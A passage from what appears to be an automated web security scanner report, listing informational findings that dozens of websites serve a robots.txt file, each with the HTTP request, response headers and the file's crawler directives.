Host:   http://www.keds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keds.com

Response

HTTP/1.0 200 OK
Server:
Last-Modified: Fri, 28 Jan 2011 18:40:12 GMT
ETag: "e8-49aec65757b00"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:38:12 GMT
Content-Length: 232
Connection: close

User-agent: *

Disallow: /store/user/login.jsp?redirectURL=/store/home/home.jsp
Disallow: /store/home/privacy.jsp
Disallow: /store/home/terms.jsp
Disallow: /store/account/
Disallow: /store/check
...[SNIP]...
30.257. http://www.kellehampton.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kellehampton.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kellehampton.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 02 May 2011 02:14:13 GMT
Date: Sun, 01 May 2011 02:14:13 GMT
Last-Modified: Sun, 01 May 2011 02:12:08 GMT
ETag: "aa398782-3c99-4a4f-9afc-1780f2c5d598"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Age: 77659
Cache-Control: public, max-age=86400, must-revalidate, proxy-revalidate

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search
Disallow: /related-content.g
Disallow: /related_content_helper.html

Sitemap: http://www.kellehampton.com/feeds/posts/defau
...[SNIP]...
30.258. http://www.kens5.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kens5.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kens5.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 30 Apr 2011 16:47:30 GMT
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Mon, 02 May 2011 00:08:50 GMT
Content-Length: 195
Connection: close
Set-Cookie: click_mobile=0

User-agent: *
sitemap: /sitemap.xml
Disallow:/search
Disallow:/searchresults
Disallow:/results
Disallow:/entertainment/movies/movie-listings
Disallow:/entertainment/movies/advanced-search
30.259. http://www.kingpayday.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kingpayday.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kingpayday.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:14 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Fri, 14 Jan 2011 20:11:47 GMT
ETag: "87360f-e7-4d30ae03"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...
30.260. http://www.knowledgerush.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.knowledgerush.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.knowledgerush.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:00:21 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Fri, 10 Sep 2010 21:21:47 GMT
ETag: "188693-c5-48fee55919560"
Accept-Ranges: bytes
Content-Length: 197
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: ia_archiver
Disallow: /
User-agent: discobot
Disallow: /
User-agent: MLBot
Disallow: /
User-agent: ccbot
Disallow: /
User-agent: archive_crawler
Disallow: /
User-agent: 008
Disallow: /
30.261. http://www.knowyourmobile.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.knowyourmobile.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.knowyourmobile.com

Response

HTTP/1.1 200 OK
Server: nginx/0.5.35
Content-Type: text/plain; charset=utf-8
X-Powered-By: NetGenie
Pragma:
Content-Length: 77
expires: -1
cache-control: no-cache
Date: Mon, 02 May 2011 00:25:35 GMT
X-Varnish: 1363337191 1339853127
Via: 1.1 varnish
Connection: close
age: 0
X-Cache: HIT
X-Cache-Hits: 1501

Sitemap: http://www.knowyourmobile.com/sitemap.xml
User-agent: *
Disallow:


30.262. http://www.kobobooks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kobobooks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kobobooks.com

Response

HTTP/1.0 200 OK
Content-Length: 24
Content-Type: text/plain
Content-Location: http://www.kobobooks.com/robots.txt
Last-Modified: Thu, 28 Apr 2011 15:28:54 GMT
Accept-Ranges: bytes
ETag: "0ff96fbb85cc1:4cf9"
Server: Microsoft-IIS/6.0
srv: web17
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:09:52 GMT
Connection: close

User-agent: *
Disallow:
30.263. http://www.kottke.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kottke.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kottke.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:18 GMT
Server: Apache
Last-Modified: Sun, 27 Jun 2004 22:36:06 GMT
ETag: "321dda-6f-3dddf3aea2180"
Accept-Ranges: bytes
Content-Length: 111
Keep-Alive: timeout=2, max=150
Connection: close
Content-Type: text/plain

# robots.txt file for kottke.org

# general crawlers

User-agent: *
Disallow: /cgi-bin
Disallow: /stats
30.264. http://www.ksrevenue.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ksrevenue.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ksrevenue.org

Response

HTTP/1.1 200 OK
Content-Length: 53
Content-Type: text/plain
Last-Modified: Thu, 28 Oct 2010 21:53:36 GMT
Accept-Ranges: bytes
ETag: "d6e17c92ea76cb1:2206"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:21:51 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /styles/
30.265. http://www.kxii.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kxii.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kxii.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 01 May 2011 23:06:02 GMT
X-Server-Name: sj-c14-r8-u31-b12
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:06:02 GMT
Content-Length: 55
Connection: close
Set-Cookie: click_mobile=0

User-agent: *
Disallow:/search
Disallow:/searchresults
30.266. http://www.lacetoleather.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lacetoleather.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lacetoleather.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:14 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Sat, 04 Oct 2008 10:17:04 GMT
ETag: "1ed4989-8e-48e742a0"
Accept-Ranges: bytes
Content-Length: 142
Connection: close
Content-Type: text/plain

# robots.txt generated at http://www.mcanerin.com
User-agent: *
Disallow:
Disallow: /cgi-bin/
Sitemap: http://lacetoleather.com/sitemap.html
30.267. http://www.latingossip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.latingossip.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.latingossip.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:55 GMT
Server: Apache/2.0.54
Last-Modified: Fri, 02 Mar 2007 20:10:36 GMT
ETag: "102ab3-df-335da700"
Accept-Ranges: bytes
Content-Length: 223
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /0/
Disallow: /images/
Disallow: /downloads/
Disallow: /stats/
Disallow: /private/
Disallow: /links/
Disallow: /go/
Disallow: /?p=
Disallow: /?cat=

User-ag
...[SNIP]...
30.268. http://www.lavalife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lavalife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lavalife.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
p3p: CP="CAO PSA OUR"
Accept-Ranges: bytes
ETag: W/"24-1296589877000"
Last-Modified: Tue, 01 Feb 2011 19:51:17 GMT
Content-Type: text/plain
Content-Length: 24
Date: Sun, 01 May 2011 03:20:05 GMT
Age: 73511
X-Cache: HIT from www.lavalife.com
Connection: close

User-agent: *
Allow: /

30.269. http://www.ldoceonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ldoceonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ldoceonline.com

Response

HTTP/1.0 200 OK
Date: Tue, 21 Sep 2010 09:41:50 GMT
Server: Apache/1.3.34 (Debian) mod_perl/1.29
Last-Modified: Wed, 17 Sep 2008 14:16:11 GMT
ETag: "18-48d1112b"
Accept-Ranges: bytes
Content-Length: 24
Content-Type: text/plain; charset=UTF-8
Age: 243471
X-Cache: HIT from www.ldoceonline.com
X-Cache-Lookup: HIT from www.ldoceonline.com:801
Via: 1.0 www.ldoceonline.com:801 (squid/2.6.STABLE5)
Connection: close

User-Agent: *
Allow: /

30.270. http://www.lduhtrp.net/image-4989411-10765500  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lduhtrp.net
Path:   /image-4989411-10765500

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lduhtrp.net

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Mon, 25 Apr 2011 22:28:50 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Mon, 02 May 2011 02:18:26 GMT

# go away
User-agent: *
Disallow: /
30.271. http://www.lee.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lee.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lee.net

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Mon, 02 May 2011 00:19:24 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=4998
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
X-Cache-Info: caching
Real-Hostname: lee.net
Content-Length: 1150

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...
30.272. http://www.lenox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lenox.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:54:27 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 22 Oct 2010 15:18:45 GMT
ETag: "42e4fb6afc71cb1:52e7"
Content-Length: 186

# robots.txt for the site http://www.lenox.com

User-agent:*
Disallow: /images
Disallow: /cart
Disallow: /checkout
Disallow: /guidedNav

SITEMAP: http://www.lenox.com/index.xml
30.273. http://www.leo.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leo.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.leo.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:51 GMT
Server: Apache
Last-Modified: Mon, 23 Oct 2006 11:46:30 GMT
ETag: "49cab-17-1319180"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=iso-8859-15

User-Agent: *
Allow: /
30.274. http://www.libertytax.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.libertytax.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.libertytax.com

Response

HTTP/1.1 200 OK
Content-Length: 1691
Content-Type: text/plain
Content-Location: http://www.libertytax.com/robots.txt
Last-Modified: Thu, 17 Feb 2011 16:48:59 GMT
Accept-Ranges: bytes
ETag: "ba222293c2cecb1:67e1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:57:12 GMT
Connection: close

User-agent: *
User-Agent: Googlebot
User-Agent: bingbot
User-agent: Googlebot-Mobile
User-agent: MSMOBOT

Disallow: /App_Code/
Disallow: /App_WebReferences/
Disallow: /AssetManagement/
Disall
...[SNIP]...
30.275. http://www.livedash.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livedash.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Mar 2011 06:46:40 GMT
ETag: "5d1107d-e6-49d7a466d9400"
Accept-Ranges: bytes
Content-Length: 230
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /smarty/
Disallow: /_inc/
Disallow: /_css/
Disallow: /js/
Disallow: /simile/
Disallow: /simplehtmldom/
Allow: /
Disallow: /templates/
Disallow: /include/
Disallow: /c
...[SNIP]...
30.276. http://www.livingonadime.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livingonadime.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livingonadime.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:44 GMT
Server: Apache
Last-Modified: Fri, 15 Apr 2011 22:18:05 GMT
Accept-Ranges: bytes
Content-Length: 94
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ebooks/
Disallow: /_private/
Disallow: /cgi-bin/
Disallow: /scripts/
30.277. http://www.ljseek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ljseek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ljseek.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:46:08 GMT
Server: Apache/2.0.63 (CentOS)
Last-Modified: Tue, 16 Feb 2010 12:52:50 GMT
ETag: "2a47b3-97-47fb736160c80"
Accept-Ranges: bytes
Content-Length: 151
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: *

Disallow: /bookmark.php
Disallow: /amazon.php
Disallow: /clickad.php
Disallow: /clickme.php
Disallow: /url.php
Disallow: /getimage.php

30.278. http://www.llewellyn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.llewellyn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.llewellyn.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:27:58 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Fri, 02 Oct 2009 21:02:01 GMT
ETag: "22e897-99-474fa13486440"
Accept-Ranges: bytes
Content-Length: 153
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_theme/
Disallow: /cart.php
Disallow: /blocks/
Disallow: /cgi-bin/
Disallow: /includes/

User-agent: Googlebot-Image
Disallow: /
30.279. http://www.localedge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localedge.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localedge.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:23 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 29 Feb 2008 17:05:38 GMT
ETag: "ac018-38-47c83b62"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /portals/*?id*
Disallow: /*?id

30.280. http://www.localism.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localism.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localism.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:35:51 GMT
Server: Apache/2.2.3 (Red Hat) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Thu, 10 Mar 2011 17:01:07 GMT
ETag: "14c825c-cc-49e23ca9a5ac0"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
30.281. http://www.localtvllc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localtvllc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localtvllc.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:47:59 GMT
Server: Apache
X-Pingback: http://www.localtvllc.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
30.282. http://www.longislandexchange.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.longislandexchange.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.longislandexchange.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:24 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 07 Mar 2011 18:07:17 GMT
ETag: "5c58a5c-e9-49de85db59f40"
Accept-Ranges: bytes
Content-Length: 233
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /guestbook/
Disallow: /icon/
Disallow: /profiles/*/guestbook/
Disallow: /profiles/*?
Disallow: /profiles/*.php$
Disallow: /press/wp-content/uploads/2009/06/air-students.jpg

#
...[SNIP]...
30.283. http://www.looktothestars.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.looktothestars.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.looktothestars.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:14 GMT
Server: nginx/0.8.54
Content-Type: text/plain
Status: 200 OK
Last-Modified: Tue, 19 Apr 2011 07:18:42 GMT
Content-Length: 101
X-Varnish: 143993793 143993400
Age: 79
Via: 1.1 varnish
X-Cache: HIT
Vary: Accept-Encoding
Connection: close

Sitemap: http://www.looktothestars.org/google_sitemap

User-agent: Googlebot
Disallow: /*/rss20.xml$
30.284. http://www.lowerhealthquotes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowerhealthquotes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowerhealthquotes.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:46:36 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 31 Mar 2011 13:37:07 GMT
ETag: "10241d0-cc-49fc763b5a6c0"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: WILDCAT_SERVER=3; path=/

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
30.285. http://www.lowerpressure.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowerpressure.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowerpressure.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=t56ek29ikpdfbr1l0tioi58at5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.lowerpressure.com/xmlrpc.php
Content-Length: 78
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.lowerpressure.com/sitemap.xml.gz
30.286. http://www.lsureveille.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lsureveille.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lsureveille.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:20 GMT
Server: Apache
ETag: W/"26-1294349890000"
Last-Modified: Thu, 06 Jan 2011 21:38:10 GMT
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.287. http://www.lttmlistings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lttmlistings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lttmlistings.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:33 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"26-1255843419000"
Last-Modified: Sun, 18 Oct 2009 05:23:39 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 26
Connection: close
X-Pad: avoid browser bug

User-agent: *
Disallow: /
30.288. http://www.luckyasiangirls.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.luckyasiangirls.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.luckyasiangirls.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:10:39 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://luckyasiangirls.com/xmlrpc.php
Rating: RTA-5042-1996-1400-1577-RTA
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://luckyasiangirls.com/sitemap.xml
30.289. http://www.lyred.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyred.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lyred.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:49:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 21 Sep 2006 09:51:07 GMT
ETag: "50f039b-17-41df3a9a0f8c0"
Accept-Ranges: bytes
Content-Length: 23
Cache-Control: max-age=3600
Expires: Mon, 02 May 2011 00:49:29 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.290. http://www.mangastream.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mangastream.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mangastream.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1247612640"
Last-Modified: Sun, 20 Feb 2011 01:48:24 GMT
Content-Length: 63
Connection: close
Date: Mon, 02 May 2011 00:33:17 GMT
Server: lighttpd/1.4.28

User-agent: *
Allow: /

User-agent: ia_archiver
Disallow: /
30.291. http://www.map24.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.map24.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.map24.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:32 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3
Last-Modified: Fri, 18 Jul 2008 12:47:36 GMT
ETag: "661e8e-95-c3180a00"
Accept-Ranges: bytes
Content-Length: 149
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for http://www.map24.com/
User-agent: *
Disallow: /res/
Disallow: /geoip/
Disallow: /nusoap/
Disallow: /classes/
Disallow: /css/
30.292. http://www.mappy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mappy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mappy.com

Response

HTTP/1.1 200 OK
Expires: Mon, 16 May 2011 00:45:25 GMT
Vary: Accept-Encoding,User-Agent
Vary: Accept-Encoding
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Content-Length: 1697
Date: Mon, 02 May 2011 00:45:25 GMT
Connection: close
Last-Modified: Wed, 04 Nov 2009 14:57:07 GMT
Server: Apache
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.293. http://www.marketintellisearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketintellisearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marketintellisearch.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:50 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 15:08:22 GMT
ETag: "c46a6-10d-4a02d3f406580"
Accept-Ranges: bytes
Content-Length: 269
Connection: close
Content-Type: text/plain

User-agent: *
User-agent: Mediapartners-Google
User-agent: Googlebot
User-agent: Googlebot-news
sitemap:http://www.marketintellisearch.com/sitemap.xml
Allow: /
Allow: /articles
Disallow: /amstock
Disa
...[SNIP]...
30.294. http://www.marrow.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marrow.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marrow.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:34 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 15:38:55 GMT
ETag: "e053-11c-4d9f2c0f"
Accept-Ranges: bytes
Content-Length: 284
Connection: close
Content-Type: text/plain

# robots.txt file for www.marrow.org

User-agent:*
Disallow: /panels/

# block google from indexing images

User-agent: Googlebot-Image
Disallow: /

# block yahoo from our images directory

...[SNIP]...
30.295. http://www.mdconsult.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mdconsult.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mdconsult.com

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Date: Mon, 02 May 2011 00:11:15 GMT
P3P: CP="ALL CURa DEVa TAIa OUR IND PHY ONL UNI PUR DEM STA"
Content-type: text/plain
Last-modified: Wed, 11 Aug 2010 13:41:33 GMT
Content-length: 19284
Accept-ranges: bytes
Connection: close

# robots.txt for http://www.mdconsult.com/
# SCCS Info: robots.txt %Z% %P% %I% %E%

Sitemap: http://www.mdconsult.com/sitemap.xml

User-agent: *
Disallow: /

User-agent: scirus-webcrawler
Use
...[SNIP]...
30.296. http://www.megajackpot4life.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.megajackpot4life.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.megajackpot4life.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 18 Nov 2010 15:37:48 GMT
